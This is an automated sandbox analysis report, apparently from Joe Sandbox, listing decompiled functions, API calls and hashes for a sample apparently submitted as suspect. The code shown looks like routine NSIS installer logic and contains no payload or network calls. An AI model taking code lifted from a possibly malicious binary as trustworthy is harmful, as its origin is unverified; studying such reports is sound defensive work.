                                                          • Opcode ID: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                          • Instruction ID: 0e1b57c135d9ed337dcee0f1630d7a3ffd6699826ab823f4ff8c6da5104765b0
                                                          • Opcode Fuzzy Hash: bc48b18717e6d0ecb647aea7fc0ab07bebcbb2e2e3a0bd9572a83b91cd6509df
                                                          • Instruction Fuzzy Hash: DCD09E71254201AFEF0D8F20DF16F2E7AA2EB94B04F11952CB682940E1DAB15C15AB19
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00406133(WCHAR* _a4) {
                                                          				signed char _t3;
                                                          				signed char _t7;
                                                          
                                                          				_t3 = GetFileAttributesW(_a4); // executed
                                                          				_t7 = _t3;
                                                          				if(_t7 != 0xffffffff) {
                                                          					SetFileAttributesW(_a4, _t3 & 0x000000fe); // executed
                                                          				}
                                                          				return _t7;
                                                          			}





                                                          0x00406138
                                                          0x0040613e
                                                          0x00406143
                                                          0x0040614c
                                                          0x0040614c
                                                          0x00406155

                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,?,00405D38,?,?,00000000,00405F0E,?,?,?,?), ref: 00406138
                                                          • SetFileAttributesW.KERNELBASE(?,00000000), ref: 0040614C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                          • Instruction ID: 3e6336b5c460747e2e1e0fbe3c4db8defb42c0044e1a92967a1d29a512d2a4bc
                                                          • Opcode Fuzzy Hash: a764032cc0ce64e7f87df91ab84dfb27e8fca44cfd77f22972d2dc2d25b91850
                                                          • Instruction Fuzzy Hash: 73D0C972514130ABC2102728AE0889ABB56EB64271B014A35F9A5A62B0CB304C628A98
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405C16(WCHAR* _a4) {
                                                          				int _t2;
                                                          
                                                          				_t2 = CreateDirectoryW(_a4, 0); // executed
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				return 0;
                                                          			}




                                                          0x00405c1c
                                                          0x00405c24
                                                          0x00000000
                                                          0x00405c2a
                                                          0x00000000

                                                          APIs
                                                          • CreateDirectoryW.KERNELBASE(?,00000000,00403633,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405C1C
                                                          • GetLastError.KERNEL32 ref: 00405C2A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: CreateDirectoryErrorLast
                                                          • String ID:
                                                          • API String ID: 1375471231-0
                                                          • Opcode ID: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                          • Instruction ID: 66e62c5d6c7775ff4cea72667941029308d228c48495a605f612c1d2d9e1fc74
                                                          • Opcode Fuzzy Hash: 3d774f31bfc7c5d70b6f8c035fc875d1b29c99f0800ffc9da4ab7b914865a185
                                                          • Instruction Fuzzy Hash: FBC04C31218605AEE7605B219F0CB177A94DB50741F114839E186F40A0DA788455D92D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040620A(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}





                                                          0x0040620e
                                                          0x0040621e
                                                          0x00406226
                                                          0x00000000
                                                          0x0040622d
                                                          0x00000000
                                                          0x0040622f

                                                          APIs
                                                          • WriteFile.KERNELBASE(?,00000000,00000000,00000000,00000000,0040DBF9,0040CEF0,00403579,0040CEF0,0040DBF9,00414EF0,00004000,?,00000000,004033A3,00000004), ref: 0040621E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 398385dbb58ca0a44fa402a726e0ab0b2131cea3ae709c8a1b666252059dd88a
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: F6E08632141129EBCF10AE548C00EEB375CFB01350F014476F955E3040D330E93087A5
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004061DB(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}





                                                          0x004061df
                                                          0x004061ef
                                                          0x004061f7
                                                          0x00000000
                                                          0x004061fe
                                                          0x00000000
                                                          0x00406200

                                                          APIs
                                                          • ReadFile.KERNELBASE(?,00000000,00000000,00000000,00000000,00414EF0,0040CEF0,004035F5,?,?,004034F9,00414EF0,00004000,?,00000000,004033A3), ref: 004061EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                          • Instruction ID: 689b8facb1381159ac92aeccc4703b7db47ce2620db9a14c340ec3ef8a35c8b1
                                                          • Opcode Fuzzy Hash: 0024165f2f5d2011be9120f41fe866c54f7b8e58de784a1218c53157080e4b8c
                                                          • Instruction Fuzzy Hash: C1E0863250021AABDF10AE518C04AEB375CEB01360F014477F922E2150D230E82187E8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E004035F8(long _a4) {
                                                          				long _t2;
                                                          
                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                          				return _t2;
                                                          			}




                                                          0x00403606
                                                          0x0040360c

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004032F6,?), ref: 00403606
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                          • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                          • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                          • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00401FA4() {
                                                          				void* _t9;
                                                          				char _t13;
                                                          				void* _t15;
                                                          				void* _t17;
                                                          				void* _t20;
                                                          				void* _t22;
                                                          
                                                          				_t19 = E00402DA6(_t15);
                                                          				E004056CA(0xffffffeb, _t7);
                                                          				_t9 = E00405C4B(_t19); // executed
                                                          				_t20 = _t9;
                                                          				if(_t20 == _t15) {
                                                          					 *((intOrPtr*)(_t22 - 4)) = 1;
                                                          				} else {
                                                          					if( *((intOrPtr*)(_t22 - 0x28)) != _t15) {
                                                          						_t13 = E00406AE0(_t17, _t20); // executed
                                                          						if( *((intOrPtr*)(_t22 - 0x2c)) < _t15) {
                                                          							if(_t13 != _t15) {
                                                          								 *((intOrPtr*)(_t22 - 4)) = 1;
                                                          							}
                                                          						} else {
                                                          							E004065AF( *((intOrPtr*)(_t22 - 0xc)), _t13);
                                                          						}
                                                          					}
                                                          					_push(_t20);
                                                          					CloseHandle();
                                                          				}
                                                          				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t22 - 4));
                                                          				return 0;
                                                          			}









                                                          0x00401faa
                                                          0x00401faf
                                                          0x00401fb5
                                                          0x00401fba
                                                          0x00401fbe
                                                          0x0040292e
                                                          0x00401fc4
                                                          0x00401fc7
                                                          0x00401fca
                                                          0x00401fd2
                                                          0x00401fe1
                                                          0x00401fe3
                                                          0x00401fe3
                                                          0x00401fd4
                                                          0x00401fd8
                                                          0x00401fd8
                                                          0x00401fd2
                                                          0x00401fea
                                                          0x00401feb
                                                          0x00401feb
                                                          0x00402c2d
                                                          0x00402c39

                                                          APIs
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                            • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                            • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                            • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                            • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                            • Part of subcall function 00405C4B: CreateProcessW.KERNELBASE ref: 00405C74
                                                            • Part of subcall function 00405C4B: CloseHandle.KERNEL32(?), ref: 00405C81
                                                          • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                            • Part of subcall function 00406AE0: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406AF1
                                                            • Part of subcall function 00406AE0: GetExitCodeProcess.KERNELBASE ref: 00406B13
                                                            • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.292638866.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.292633849.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292664060.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292695326.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292705832.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292767334.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292786938.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292798492.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292806668.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.292812000.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_xeWd55M5Lb.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                          • String ID:
                                                          • API String ID: 2972824698-0
                                                          • Opcode ID: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                          • Instruction ID: 7fe263eab699b123ac8c37dffe14ee58438593542e676086741668bd6549bbba
                                                          • Opcode Fuzzy Hash: 98c10e394aa7211d00c312830497ac903b837474ab48397c41695a6fe6023c65
                                                          • Instruction Fuzzy Hash: 3DF09072905112EBDF21BBA59AC4DAE76A4DF01318B25453BE102B21E0D77C4E528A6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E00405809(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                          				struct HWND__* _v8;
                                                          				long _v12;
                                                          				struct tagRECT _v28;
                                                          				void* _v36;
                                                          				signed int _v40;
                                                          				int _v44;
                                                          				int _v48;
                                                          				signed int _v52;
                                                          				int _v56;
                                                          				void* _v60;
                                                          				void* _v68;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				struct HWND__* _t94;
                                                          				long _t95;
                                                          				int _t100;
                                                          				void* _t108;
                                                          				intOrPtr _t130;
                                                          				struct HWND__* _t134;
                                                          				int _t156;
                                                          				int _t159;
                                                          				struct HMENU__* _t164;
                                                          				struct HWND__* _t168;
                                                          				struct HWND__* _t169;
                                                          				int _t171;
                                                          				void* _t172;
                                                          				short* _t173;
                                                          				short* _t175;
                                                          				int _t177;
                                                          
                                                          				_t169 =  *0x429244;
                                                          				_t156 = 0;
                                                          				_v8 = _t169;
                                                          				if(_a8 != 0x110) {
                                                          					if(_a8 == 0x405) {
                                                          						CloseHandle(CreateThread(0, 0, E0040579D, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                          					}
                                                          					if(_a8 != 0x111) {
                                                          						L17:
                                                          						_t171 = 1;
                                                          						if(_a8 != 0x404) {
                                                          							L25:
                                                          							if(_a8 != 0x7b) {
                                                          								goto L20;
                                                          							}
                                                          							_t94 = _v8;
                                                          							if(_a12 != _t94) {
                                                          								goto L20;
                                                          							}
                                                          							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                          							_a8 = _t95;
                                                          							if(_t95 <= _t156) {
                                                          								L36:
                                                          								return 0;
                                                          							}
                                                          							_t164 = CreatePopupMenu();
                                                          							AppendMenuW(_t164, _t156, _t171, E004066A5(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                          							_t100 = _a16;
                                                          							_t159 = _a16 >> 0x10;
                                                          							if(_a16 == 0xffffffff) {
                                                          								GetWindowRect(_v8,  &_v28);
                                                          								_t100 = _v28.left;
                                                          								_t159 = _v28.top;
                                                          							}
                                                          							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                          								_v60 = _t156;
                                                          								_v48 = 0x423748;
                                                          								_v44 = 0x1000;
                                                          								_a4 = _a8;
                                                          								do {
                                                          									_a4 = _a4 - 1;
                                                          									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                          								} while (_a4 != _t156);
                                                          								OpenClipboard(_t156);
                                                          								EmptyClipboard();
                                                          								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                          								_a4 = _t108;
                                                          								_t172 = GlobalLock(_t108);
                                                          								do {
                                                          									_v48 = _t172;
                                                          									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                          									 *_t173 = 0xd;
                                                          									_t175 = _t173 + 2;
                                                          									 *_t175 = 0xa;
                                                          									_t172 = _t175 + 2;
                                                          									_t156 = _t156 + 1;
                                                          								} while (_t156 < _a8);
                                                          								GlobalUnlock(_a4);
                                                          								SetClipboardData(0xd, _a4);
                                                          								CloseClipboard();
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						if( *0x42922c == _t156) {
                                                          							ShowWindow( *0x42a268, 8);
                                                          							if( *0x42a2ec == _t156) {
                                                          								E004056CA( *((intOrPtr*)( *0x422720 + 0x34)), _t156);
                                                          							}
                                                          							E0040459D(_t171);
                                                          							goto L25;
                                                          						}
                                                          						 *0x421f18 = 2;
                                                          						E0040459D(0x78);
                                                          						goto L20;
                                                          					} else {
                                                          						if(_a12 != 0x403) {
                                                          							L20:
                                                          							return E0040462B(_a8, _a12, _a16);
                                                          						}
                                                          						ShowWindow( *0x429230, _t156);
                                                          						ShowWindow(_t169, 8);
                                                          						E004045F9(_t169);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_v52 = _v52 | 0xffffffff;
                                                          				_v40 = _v40 | 0xffffffff;
                                                          				_t177 = 2;
                                                          				_v60 = _t177;
                                                          				_v56 = 0;
                                                          				_v48 = 0;
                                                          				_v44 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t130 =  *0x42a270;
                                                          				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                          				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                          				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                          				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                          				_t134 = GetDlgItem(_a4, 0x3f8);
                                                          				 *0x429244 = _t134;
                                                          				_v8 = _t134;
                                                          				E004045F9( *0x429230);
                                                          				 *0x429234 = E00404F52(4);
                                                          				 *0x42924c = 0;
                                                          				GetClientRect(_v8,  &_v28);
                                                          				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                          				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                          				SendMessageW(_v8, 0x1036, 0x4000, 0x4000);
                                                          				if(_a8 >= 0) {
                                                          					SendMessageW(_v8, 0x1001, 0, _a8);
                                                          					SendMessageW(_v8, 0x1026, 0, _a8);
                                                          				}
                                                          				if(_a12 >= _t156) {
                                                          					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                          				}
                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          				_push(0x1b);
                                                          				E004045C4(_a4);
                                                          				if(( *0x42a278 & 0x00000003) != 0) {
                                                          					ShowWindow( *0x429230, _t156);
                                                          					if(( *0x42a278 & 0x00000002) != 0) {
                                                          						 *0x429230 = _t156;
                                                          					} else {
                                                          						ShowWindow(_v8, 8);
                                                          					}
                                                          					E004045F9( *0x429228);
                                                          				}
                                                          				_t168 = GetDlgItem(_a4, 0x3ec);
                                                          				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                          				if(( *0x42a278 & 0x00000004) != 0) {
                                                          					SendMessageW(_t168, 0x409, _t156, _a12);
                                                          					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                          				}
                                                          				goto L36;
                                                          			}

































                                                          0x00405811
                                                          0x00405817
                                                          0x00405821
                                                          0x00405824
                                                          0x004059ba
                                                          0x004059de
                                                          0x004059de
                                                          0x004059f1
                                                          0x00405a0f
                                                          0x00405a11
                                                          0x00405a19
                                                          0x00405a6f
                                                          0x00405a73
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a75
                                                          0x00405a7b
                                                          0x00000000
                                                          0x00000000
                                                          0x00405a85
                                                          0x00405a8d
                                                          0x00405a90
                                                          0x00405b92
                                                          0x00000000
                                                          0x00405b92
                                                          0x00405a9f
                                                          0x00405aaa
                                                          0x00405ab3
                                                          0x00405abe
                                                          0x00405ac1
                                                          0x00405aca
                                                          0x00405ad0
                                                          0x00405ad3
                                                          0x00405ad3
                                                          0x00405aeb
                                                          0x00405af4
                                                          0x00405af7
                                                          0x00405afe
                                                          0x00405b05
                                                          0x00405b0d
                                                          0x00405b0d
                                                          0x00405b24
                                                          0x00405b24
                                                          0x00405b2b
                                                          0x00405b31
                                                          0x00405b3d
                                                          0x00405b44
                                                          0x00405b4d
                                                          0x00405b4f
                                                          0x00405b52
                                                          0x00405b61
                                                          0x00405b64
                                                          0x00405b6a
                                                          0x00405b6b
                                                          0x00405b71
                                                          0x00405b72
                                                          0x00405b73
                                                          0x00405b7b
                                                          0x00405b86
                                                          0x00405b8c
                                                          0x00405b8c
                                                          0x00000000
                                                          0x00405aeb
                                                          0x00405a21
                                                          0x00405a51
                                                          0x00405a59
                                                          0x00405a64
                                                          0x00405a64
                                                          0x00405a6a
                                                          0x00000000
                                                          0x00405a6a
                                                          0x00405a25
                                                          0x00405a2f
                                                          0x00000000
                                                          0x004059f3
                                                          0x004059f9
                                                          0x00405a34
                                                          0x00000000
                                                          0x00405a3d
                                                          0x00405a02
                                                          0x00405a07
                                                          0x00405a0a
                                                          0x00000000
                                                          0x00405a0a
                                                          0x004059f1
                                                          0x0040582a
                                                          0x0040582e
                                                          0x00405836
                                                          0x0040583a
                                                          0x0040583d
                                                          0x00405840
                                                          0x00405843
                                                          0x00405846
                                                          0x00405847
                                                          0x00405848
                                                          0x00405861
                                                          0x00405864
                                                          0x0040586e
                                                          0x0040587d
                                                          0x00405885
                                                          0x0040588d
                                                          0x00405892
                                                          0x00405895
                                                          0x004058a1
                                                          0x004058aa
                                                          0x004058b3
                                                          0x004058d5
                                                          0x004058db
                                                          0x004058ec
                                                          0x004058f1
                                                          0x004058ff
                                                          0x0040590d
                                                          0x0040590d
                                                          0x00405912
                                                          0x00405920
                                                          0x00405920
                                                          0x00405925
                                                          0x00405928
                                                          0x0040592d
                                                          0x00405939
                                                          0x00405942
                                                          0x0040594f
                                                          0x0040595e
                                                          0x00405951
                                                          0x00405956
                                                          0x00405956
                                                          0x0040596a
                                                          0x0040596a
                                                          0x0040597e
                                                          0x00405987
                                                          0x00405990
                                                          0x004059a0
                                                          0x004059ac
                                                          0x004059ac
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00405867
                                                          • GetDlgItem.USER32 ref: 00405876
                                                          • GetClientRect.USER32 ref: 004058B3
                                                          • GetSystemMetrics.USER32 ref: 004058BA
                                                          • SendMessageW.USER32(?,00001061,00000000,?), ref: 004058DB
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004058EC
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004058FF
                                                          • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040590D
                                                          • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405920
                                                          • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405942
                                                          • ShowWindow.USER32(?,00000008), ref: 00405956
                                                          • GetDlgItem.USER32 ref: 00405977
                                                          • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405987
                                                          • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004059A0
                                                          • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004059AC
                                                          • GetDlgItem.USER32 ref: 00405885
                                                            • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                          • GetDlgItem.USER32 ref: 004059C9
                                                          • CreateThread.KERNEL32 ref: 004059D7
                                                          • CloseHandle.KERNEL32(00000000), ref: 004059DE
                                                          • ShowWindow.USER32(00000000), ref: 00405A02
                                                          • ShowWindow.USER32(?,00000008), ref: 00405A07
                                                          • ShowWindow.USER32(00000008), ref: 00405A51
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405A85
                                                          • CreatePopupMenu.USER32 ref: 00405A96
                                                          • AppendMenuW.USER32 ref: 00405AAA
                                                          • GetWindowRect.USER32 ref: 00405ACA
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405AE3
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B1B
                                                          • OpenClipboard.USER32(00000000), ref: 00405B2B
                                                          • EmptyClipboard.USER32 ref: 00405B31
                                                          • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405B3D
                                                          • GlobalLock.KERNEL32 ref: 00405B47
                                                          • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405B5B
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                                                          • SetClipboardData.USER32(0000000D,00000000), ref: 00405B86
